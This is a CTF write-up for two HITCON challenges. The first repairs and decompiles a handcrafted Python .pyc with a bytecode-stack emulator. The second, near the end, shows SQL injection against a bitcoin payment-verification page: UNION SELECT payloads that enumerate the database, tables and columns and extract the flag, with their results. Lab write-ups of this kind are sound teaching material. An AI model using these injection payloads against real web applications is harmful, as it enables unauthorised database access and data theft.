HITCON CTF writeup


1. Handcrafted Pyc

We were given a Python bytecode file (.pyc) to reverse. I tried uncompyle2 (and uncompyle6) first, but it didn't work: the magic bytes in the header were corrupted. To recover them, copy the 8-byte header (magic number plus timestamp) from a valid Python 2 .pyc and append the challenge bytecode to it:

# take the first 8 bytes (magic + mtime) from a known-good .pyc
head -c 8 example.pyc > bytecode.pyc
# append the challenge file, which lacks a valid header
cat bytecode >> bytecode.pyc

Decompiling the repaired file with uncompyle2 then produced Python assembly instead of Python source, because the whole program had been handcrafted at the bytecode level, so it had to be inspected manually.
After reading the documentation of the Python bytecode instructions, I wrote a script (Python 2) that replays the stack operations (LOAD_CONST, ROT_TWO and BINARY_ADD) over the saved disassembly to extract the password:

# 'string' holds the disassembly text; the first 16 columns (line/offset numbers)
# are skipped so that val[0] is the opcode name and val[2] the "(const)" operand.
with open('string', 'r') as file_obj:
    data = file_obj.readlines()
i = 0          # counts LOAD_CONST instructions seen so far
stack = []     # emulated value stack
print len(data)
for line in data:
    print "[+]In loop %d " % i
    val = line[16:].split()
    if i == 70:                     # debug: dump the stack after 70 constants
        print stack
    if val[0] == "LOAD_CONST":
        i = i + 1
        dat = val[2].split('(')[1].split(')')[0]
        if dat != 'None':
            dat = chr(int(dat))     # constants are character codes
        stack.append(dat)
    if val[0] == "ROT_TWO":         # swap the two topmost entries
        temp = stack[-2]
        stack[-2] = stack[-1]
        stack[-1] = temp
    if val[0] == "BINARY_ADD":      # TOS1 + TOS replaces both
        stack[-2] += stack[-1]
        stack.pop(-1)
print stack
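The script above is one instance of a general approach: treat the disassembly as a stack machine and replay only the opcodes that build the secret. The Python 3 version below is an added example, not code from the writeup; it parses dis-style text (the embedded sample is constructed, not the challenge's bytecode), models LOAD_CONST, ROT_TWO, ROT_THREE, BINARY_ADD and RETURN_VALUE, and refuses to continue on any opcode it does not model instead of silently producing a wrong value.

```python
import ast
import re

# Constructed sample in Python 2 dis/uncompyle2 layout: push 3 codes, swap, concat.
SAMPLE_DISASSEMBLY = """\
  1           0 LOAD_CONST               1 (104)
              3 LOAD_CONST               2 (116)
              6 LOAD_CONST               3 (105)
              9 ROT_TWO
             10 BINARY_ADD
             11 BINARY_ADD
        >>   12 RETURN_VALUE
"""
OPNAME_RE = re.compile(r'[A-Z][A-Z_]*')

def parse_instructions(text):
    """Yield (opname, argrepr) from dis-style text, skipping non-code lines."""
    for line in text.splitlines():
        tokens = line.replace('>>', ' ').split()  # drop jump-target markers
        for idx, tok in enumerate(tokens):
            if OPNAME_RE.fullmatch(tok):
                break
        else:
            continue                              # banner or blank line
        match = re.search(r'\((.*)\)$', ' '.join(tokens[idx + 1:]))
        yield tok, (match.group(1) if match else None)

def decode_constant(argrepr):
    """LOAD_CONST operand: ints are character codes here, as in the writeup."""
    value = ast.literal_eval(argrepr)
    return chr(value) if isinstance(value, int) else value

def emulate(text):
    """Replay the stack effects of the opcodes that build the secret."""
    stack = []
    for op, arg in parse_instructions(text):
        if op == 'LOAD_CONST':
            stack.append(decode_constant(arg))
        elif op == 'ROT_TWO':                     # swap TOS and TOS1
            stack[-1], stack[-2] = stack[-2], stack[-1]
        elif op == 'ROT_THREE':                   # TOS moves down to third place
            stack[-1], stack[-2], stack[-3] = stack[-2], stack[-3], stack[-1]
        elif op == 'BINARY_ADD':                  # TOS1 + TOS replaces both
            rhs = stack.pop()
            stack[-1] = stack[-1] + rhs
        elif op == 'RETURN_VALUE':
            return stack.pop()
        else:                                     # refuse to guess at anything else
            raise NotImplementedError('opcode not modelled: ' + op)
    return stack                                  # no RETURN_VALUE seen
```

Running emulate(SAMPLE_DISASSEMBLY) returns the string built by the sample; feeding it the real disassembly shows at which unmodelled opcode the replay stops, which tells you what to add next.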

Instead of uncompyle2, the dis module from the standard library can also produce the assembly. The code below (Python 2, since the marshalled code object is Python 2 bytecode) disassembles the code object recursively, descending into nested code objects stored in co_consts:

import dis
import types
import marshal, zlib, base64

def get_code_object(obj, compilation_mode="exec"):
    # Accept a code object, frame, function or source string and return its code object
    if isinstance(obj, types.CodeType):
        return obj
    elif isinstance(obj, types.FrameType):
        return obj.f_code
    elif isinstance(obj, types.FunctionType):
        return obj.__code__
    elif isinstance(obj, str):
        try:
            return compile(obj, "", compilation_mode)
        except SyntaxError as error:
            print "error:", error
    else:
        raise TypeError("get_code_object() can not handle '%s' objects" % (type(obj).__name__,))

def diss(obj, mode="exec", recurse=False):
    _visit(obj, dis.dis, mode, recurse)

def ssc(obj, mode="exec", recurse=False):
    # dis.show_code only exists on Python 3.2+; this helper is not used below
    _visit(obj, dis.show_code, mode, recurse)

def _visit(obj, visitor, mode="exec", recurse=False):
    obj = get_code_object(obj, mode)
    visitor(obj)
    if recurse:
        # nested functions, classes and lambdas are code objects inside co_consts
        for constant in obj.co_consts:
            if type(constant) is type(obj):
                print
                print 'recursing into %r:' % (constant,)
                _visit(constant, visitor, mode, recurse)

# zlib-compressed, base64-encoded marshal dump of the challenge code object (truncated here)
codeobj = marshal.loads(zlib.decompress(base64.b64decode('eJyNVkt....')))
diss(codeobj, "exec", True)

2. Bitcoin Writeup

We were given a page which generates a bitcoin address and then asks us to verify the payment.
After some time I found that it is vulnerable to error-based SQL injection. The injected addresses and what each one returned:

1NahfkZo5S6JrZxhR2jXWm3nhMBerQRoDU' AND 1=0 UNION ALL SELECT database() -- '
database() = areyourich

114j4PJhqj6ZihacUx4CQnActDSm9tqpxd' AND 1=0 union all select table_name from information_schema.tables where table_schema=database() limit 1 -- '
table_name = flag1

select column_name from information_schema.columns where table_name="flag1";
column_name = flag

114j4PJhqj6ZihacUx4CQnActDSm9tqpxd' AND 1=0 union all select flag from areyourich.flag1 limit 1 -- '
gave the flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

To extract the second flag, you have to inject a bitcoin address via SELECT such that the account appears to hold 10000 bitcoins.